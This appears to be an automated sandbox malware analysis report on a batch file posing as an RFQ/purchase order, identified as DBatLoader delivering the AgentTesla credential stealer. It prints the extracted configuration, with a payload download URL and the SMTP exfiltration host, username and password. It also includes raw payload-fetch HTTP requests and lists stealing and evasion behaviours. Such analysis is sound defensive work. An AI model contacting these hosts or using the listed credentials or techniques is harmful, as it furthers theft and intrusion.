Windows Analysis Report
RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat

Overview

General Information

Sample name: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat
Analysis ID: 1560318
MD5: ae6a8a43561ba85215f8b9986001a520
SHA1: 08d50775b58ae5f13b971a674e7799477a5bd00c
SHA256: a0b4998d451f008fd7f752ef86b9a7306684f9193f07db1986273727636da61e
Tags: batuser-lowmal3
Infos:

Detection

AgentTesla, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected DBatLoader
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found large BAT file
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
 https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Name Description Attribution Blogpost URLs Link
DBatLoader This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Avira: detection malicious, Label: HEUR/AGEN.1325995
Source: C:\Users\user\AppData\Local\Temp\x.exe Avira: detection malicious, Label: HEUR/AGEN.1325995
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Avira: detection malicious, Label: W32/Infector.Gen
Found malware configuration
Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat Malware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
Source: 13.0.neworigin.exe.a60000.0.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Libraries\Wisrysxl.PIF ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\x.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe ReversingLabs: Detection: 65%
Multi AV Scanner detection for submitted file
Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat ReversingLabs: Detection: 23%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\x.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49775 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49797 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1472715771.00000000022E6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1441667884.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1445817918.0000000005170000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbH source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.1474717040.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1446636535.000000002212F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1446636535.00000000220FE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330164805.00000000028C9000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1329954497.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1472715771.00000000022E6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: esentutl.exe, 00000008.00000003.1441667884.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1445817918.0000000005170000.00000004.00001000.00020000.00000000.sdmp

Spreading
barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Users\Public\Libraries\lxsyrsiW.pif System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E45908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 4_2_02E45908
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 4x nop then jmp 00987394h 14_2_00987108
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 4x nop then jmp 009878DCh 14_2_0098767A
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 14_2_00987E60
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 14_2_00987E5F
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 14_2_00987FBC
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 4x nop then jmp 065EBCBDh 20_2_065EBA40

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://gxe0.com/yak/233_Wisrysxlfss
Contains functionality to check if a connection to the internet is available
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02E5E4B8 InternetCheckConnectionA, 4_2_02E5E4B8
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.10:49749 -> 51.195.88.199:587
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.252.105.91 198.252.105.91
Source: Joe Sandbox View IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View IP Address: 104.26.13.205 104.26.13.205
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49713 -> 198.252.105.91:443
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.10:49749 -> 51.195.88.199:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: gxe0.com
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: s82.gocheapweb.com
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000010.00000002.1551553255.0000000003098000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839347953.00000000066FA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839519274.0000000006710000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r11.i.lencr.org/0
Source: neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839347953.00000000066FA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839519274.0000000006710000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r11.o.lencr.org0#
Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002F65000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://s82.gocheapweb.com
